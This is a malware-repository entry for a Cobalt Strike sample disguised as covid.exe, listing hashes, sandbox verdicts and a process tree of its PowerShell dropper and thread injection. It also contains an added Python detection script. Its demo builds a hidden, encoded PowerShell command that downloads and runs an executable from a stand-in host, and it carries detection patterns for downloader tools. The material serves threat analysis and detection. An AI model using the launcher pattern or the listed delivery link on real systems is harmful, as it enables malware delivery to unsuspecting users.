MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

CobaltStrike

Vendor detections: 7

SHA256 hash: 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0
SHA3-384 hash: 6cc5e5b300ac3f1ff8e7a153f09e76a464a2d459e27368cecfcfec3fada21374b9a44db6deb8032e33ca93e3ad9d1d5f
SHA1 hash: 210c7bed3182e3113b9a20816ced2f9c2ad6f86a
MD5 hash: a990c03d14bef241e880d6167fa5a6aa
humanhash: hawaii-carolina-table-asparagus
File name: covid.exe
Signature: CobaltStrike
File size: 5'253'560 bytes
First seen: 2021-04-01 05:56:45 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash: f34d5f2d4577ed6d9ceec516c1f5a744 (48'657 x AgentTesla, 19'468 x Formbook, 12'206 x SnakeKeylogger). Note: this is the imphash of a .NET executable whose only native import is mscoree.dll!_CorExeMain, which is why it is shared by tens of thousands of unrelated samples; it is not a useful pivot for this sample.
ssdeep: 1536:LLh9KxmwAPQDPjPbFxCxQIxSPTSWPyl1tszJDrj:LLh9Lsrj
Threatray: 648 similar samples on MalwareBazaar
TLSH: 6F36E057A4F710DAA09792755FDCF8BF86B9E01B1A6E7AB31140E352CF357984A230B0
Reporter: ankit_anubhav
Tags: Cobalt Strike

Intelligence

File Origin
# of uploads: 1
# of downloads: 102
Origin country: n/a

Vendor Threat Intelligence
Malware family: n/a
ID: 1
File name: https://1drv.ms/u/s!AgPvhwlpBHeFoyfME-AwK86GTgEI?e=RmNNok
Verdict: Malicious activity
Analysis date: 2021-03-31 02:54:58 UTC
Tags: covid19

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample

Result
Verdict: Clean
Maliciousness: n/a
Behaviour
Launching a process
Creating a process with a hidden window
Creating a window
Sending a UDP request

Result
Verdict: MALICIOUS
Details
Windows PE Executable: Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.

Result
Threat name: Unknown
Detection: malicious
Classification: bank.troj.evad
Score: 100 / 100
Signature
Allocates memory in foreign processes
Antivirus / Scanner detection for submitted sample
Bypasses PowerShell execution policy
Early bird code injection technique detected
Encrypted powershell cmdline option found
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Encoded PowerShell Command Line
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Powershell Load Encrypted Assembly
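Several of the signatures above (encrypted/encoded PowerShell command line, execution-policy bypass, dropper URLs in PowerShell memory, the Sigma "Suspicious Encoded PowerShell Command Line" hit) are the kind of check a detection engineer would reproduce over process-creation telemetry. The script below is an added example, not code from MalwareBazaar, ANY.RUN, Joe Sandbox or any other vendor on this page. It parses a powershell.exe command line, accepting the abbreviated parameter forms PowerShell itself accepts (-e, -ec, -enc, -ep, -w and so on, which is broader than the single form most simple rules look for), decodes an -EncodedCommand payload from base64/UTF-16LE, and scans both the raw command line and the decoded script for download calls, URLs and reflective assembly loading. The command lines, the stage-2 script and the host stage.example.invalid are constructed for the demo; the sample's real dropper URL is not on this page and is not reproduced here.

```python
"""Triage of PowerShell command lines for the behaviours listed above.

Added example, not code from MalwareBazaar or any of the sandbox vendors.
All command lines and URLs are constructed for the demo (the ".invalid" TLD
is reserved and never resolves); nothing here is taken from the sample.
"""
import base64
import re
from typing import Optional

_TOKENS = re.compile(r"\"[^\"]*\"|'[^']*'|\S+")
_URL = re.compile(r"https?://[^\s'\"<>()]+", re.I)
_DOWNLOADER = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\bcurl\b|\bwget\b|Start-BitsTransfer", re.I)
_ASSEMBLY_LOAD = re.compile(
    r"\[(?:System\.)?Reflection\.Assembly\]::Load|FromBase64String", re.I)


def _is_flag(tok: str, name: str, aliases=()) -> bool:
    """powershell.exe accepts any unambiguous prefix of a parameter name
    (-enc, -encod, -encodedcommand all mean -EncodedCommand) plus a few
    documented short forms (-ec, -ep)."""
    if len(tok) < 2 or tok[0] not in "-/":
        return False
    body = tok[1:].lower()
    return body in aliases or name.startswith(body)


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return None if the
    payload is missing or not decodable (malformed payloads are common)."""
    if not b64:
        return None
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Parse the launch flags, decode -EncodedCommand, and scan both the raw
    command line and the decoded script for dropper indicators."""
    toks = [t.strip("\"'") for t in _TOKENS.findall(cmdline)]
    f = {"encoded": False, "decoded": None, "execution_policy_bypass": False,
         "hidden_window": False, "urls": [], "downloader": False,
         "loads_assembly": False, "score": 0, "verdict": "benign"}
    i = 0
    while i < len(toks):
        tok = toks[i]
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        # EncodedCommand is checked first: a bare "-e" resolves to it.
        if _is_flag(tok, "encodedcommand", ("ec",)):
            f["encoded"] = True
            f["decoded"] = decode_encoded_command(nxt)
            i += 2
        elif _is_flag(tok, "executionpolicy", ("ep",)):
            f["execution_policy_bypass"] = nxt.lower() in ("bypass", "unrestricted")
            i += 2
        elif _is_flag(tok, "windowstyle"):
            f["hidden_window"] = nxt.lower() == "hidden"
            i += 2
        else:
            i += 1
    text = cmdline + "\n" + (f["decoded"] or "")
    f["urls"] = sorted(set(_URL.findall(text)))
    f["downloader"] = bool(_DOWNLOADER.search(text))
    f["loads_assembly"] = bool(_ASSEMBLY_LOAD.search(text))
    # Weighted the way a Sigma-style rule would be tuned: encoding and a
    # policy bypass alone are noisy in admin scripts; with a download they are not.
    f["score"] = (2 * f["encoded"] + 2 * f["execution_policy_bypass"]
                  + f["hidden_window"] + 2 * f["downloader"]
                  + 2 * f["loads_assembly"] + (1 if f["urls"] else 0))
    f["verdict"] = "suspicious" if f["score"] >= 4 else "benign"
    return f


def build_cmdline(script: str) -> str:
    """Encode a script the way an -EncodedCommand launcher does (demo helper)."""
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -Ep Bypass -Enc {enc}"


# Constructed stage-2 script: fetch a PE into %APPDATA% and run it. The host
# is fictional; the sample's real URL is not known from this page.
SAMPLE_SCRIPT = ("$u='http://stage.example.invalid/buyonegetone.exe';"
                 "$p=\"$env:APPDATA\\buyonegetone.exe\";"
                 "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p")
SAMPLE_CMDLINE = build_cmdline(SAMPLE_SCRIPT)
BENIGN_CMDLINE = 'powershell.exe -NoProfile -Command "Get-Date"'

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        r = triage(line)
        print(r["verdict"], r["score"], r["urls"])
```

Feed it the CommandLine field of Sysmon event 1 or Windows Security event 4688 records; an undecodable -EncodedCommand payload is reported with decoded set to None rather than dropped, since a broken payload is still worth a look.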
Behaviour
Behavior Graph (ID 379751, sample covid.exe, start date 01/04/2021, architecture WINDOWS, score 100), reconstructed as a process tree from the graph export:

Sample-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Potential dropper URLs found in powershell memory; 2 other signatures

covid.exe
  drops C:\Users\user\AppData\Local\...\covid.exe.log (ASCII)
  signatures: Malicious encrypted Powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy
  -> powershell.exe
       drops C:\Users\user\AppData\...\buyonegetone.exe (PE32+)
       drops PowerShell_transcr....20210401080426.txt (UTF-8)
       signatures: Uses cmd line tools excessively to alter registry or file data; Powershell drops PE file
       -> buyonegetone.exe
            signatures: Early bird code injection technique detected; Writes to foreign memory regions; Allocates memory in foreign processes; Queues an APC in another process (thread injection)
            -> mobsync.exe
                 -> WerFault.exe -> 13.88.21.125 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
            -> conhost.exe
       -> iexplore.exe -> www.who.int
            -> iexplore.exe -> fontawesome-cdn.fonticons.netdna-cdn.com 23.111.9.35, 443, 49708, 49709 (HIGHWINDS2US, United States); 108.177.15.154 (GOOGLEUS, United States); 23 other IPs or domains
       -> conhost.exe
       -> 2 other processes
buyonegetone.exe (three further instances started from the root node, separately from the covid.exe chain)
  signatures: Early bird code injection technique detected; Writes to foreign memory regions; Allocates memory in foreign processes
  -> mobsync.exe -> WerFault.exe -> 168.61.161.212 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
  -> mobsync.exe -> WerFault.exe -> 192.168.2.1 (unknown)
  -> mobsync.exe -> 168.62.194.64 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
  -> conhost.exe (one per instance)

Triage note: the WerFault.exe connections to Microsoft address space are Windows Error Reporting traffic that follows the mobsync.exe crashes, and the iexplore.exe traffic (www.who.int, CDN and Google addresses) comes from a browser window opened by the PowerShell stage, so none of these should be treated as command-and-control indicators without further evidence. The only connection made directly by an injected mobsync.exe is to 168.62.194.64, which is the address to examine first.
Result
Threat name: Win32.Ransomware.Generic
Status: Suspicious
First seen: 2021-03-31 19:26:40 UTC
AV detection: 10 of 29 (34.48%)
Threat level: 5/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Unpacked files
SHA256 hash: 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0
MD5 hash: a990c03d14bef241e880d6167fa5a6aa
SHA1 hash: 210c7bed3182e3113b9a20816ced2f9c2ad6f86a

File information


The table below shows additional information about this malware sample such as delivery method and external references.
